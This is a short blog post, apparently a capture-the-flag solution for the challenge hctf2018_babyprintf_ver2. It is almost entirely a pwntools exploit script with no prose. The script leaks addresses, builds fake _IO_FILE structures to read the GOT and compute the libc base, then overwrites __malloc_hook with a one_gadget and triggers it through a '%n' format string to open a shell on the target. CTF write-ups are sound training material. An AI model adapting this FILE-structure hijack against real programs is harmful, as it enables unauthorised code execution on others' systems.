hctf2018_babyprintf_ver2 


from pwn import *
context.log_level = 'debug'
# context.arch = 'amd64'
libc = ELF('./libc-2.27.so')
file = './babyprintf_ver2'
elf = ELF(file)
shellcode = asm(shellcraft.sh())

local = 1
if local:
    io = process(file)
else:
    io = remote('node4.buuoj.cn',25727)

def debug():
    gdb.attach(io)


def pack_file(_flags = 0,
              _IO_read_ptr = 0,
              _IO_read_end = 0,
              _IO_read_base = 0,
              _IO_write_base = 0,
              _IO_write_ptr = 0,
              _IO_write_end = 0,
              _IO_buf_base = 0,
              _IO_buf_end = 0,
              _IO_save_base = 0,
              _IO_backup_base = 0,
              _IO_save_end = 0,
              _IO_marker = 0,
              _IO_chain = 0,
              _fileno = 0,
              _lock = 0,
              _wide_data = 0,
              _mode = 0):
    file_struct = p32(_flags) + \
             p32(0) + \
             p64(_IO_read_ptr) + \
             p64(_IO_read_end) + \
             p64(_IO_read_base) + \
             p64(_IO_write_base) + \
             p64(_IO_write_ptr) + \
             p64(_IO_write_end) + \
             p64(_IO_buf_base) + \
             p64(_IO_buf_end) + \
             p64(_IO_save_base) + \
             p64(_IO_backup_base) + \
             p64(_IO_save_end) + \
             p64(_IO_marker) + \
             p64(_IO_chain) + \
             p32(_fileno)
    li('_IO_write_base',_IO_write_base)
    file_struct = file_struct.ljust(0x88, b"\x00")
    file_struct += p64(_lock)
    file_struct = file_struct.ljust(0xa0, b"\x00")
    file_struct += p64(_wide_data)
    file_struct = file_struct.ljust(0xc0, b'\x00')
    file_struct += p64(_mode)
    file_struct = file_struct.ljust(0xd8, b"\x00")
    return file_struct

r = lambda : io.recv()
rx = lambda x: io.recv(x)
ru = lambda x: io.recvuntil(x)
rud = lambda x: io.recvuntil(x, drop=True)
s = lambda x: io.send(x)
sl = lambda x: io.sendline(x)
sa = lambda x, y: io.sendafter(x, y)
sla = lambda x, y: io.sendlineafter(x, y)
li = lambda name,x : log.info(name+':'+hex(x))
shell = lambda : io.interactive()

ru('location to 0x')
ahello = int(rx(12),16)
li('ahello',ahello)
pie_base = ahello - 0x202010
li('pie_base',pie_base)
buf = ahello

flag = 0
flag &= ~8
flag |= 0x800
flag |= 0x8000   ####import
li('flag',flag)
where = pie_base + elf.got['read']
fake_file = pack_file(_flags = flag,
               _IO_read_end = where,
               _IO_write_base = where,
               _IO_write_ptr = where + 8,
               _fileno = 1)
pay1 = b'A' * 16
pay1 += p64(buf + 32)
pay1 += p64(0)
pay1 += fake_file
io.recvuntil('Have fun!\n')
sl(pay1)
read_addr = u64(ru('\x7f')[-6:].ljust(8,b'\x00'))
li('read_addr',read_addr)
libcbase = read_addr - libc.sym['read']
li('libcbase',libcbase)
malloc_hook = libcbase + libc.sym['__malloc_hook']
one = libcbase + 0x10a41c
li('one',one)
flag = 0
flag &= ~8
flag |= 0x8000 
fake_file = pack_file(_flags = flag,
                      _IO_write_ptr = malloc_hook,
                      _IO_write_end = malloc_hook + 8,
                        )
pay2 = p64(one) + p64(0) + p64(buf+32) + p64(0) + fake_file
sl(pay2)
sl("%n")
shell()

 

 

posted @ 2022-01-26 15:38  ATKevin  阅读(122)  评论(0)    收藏  举报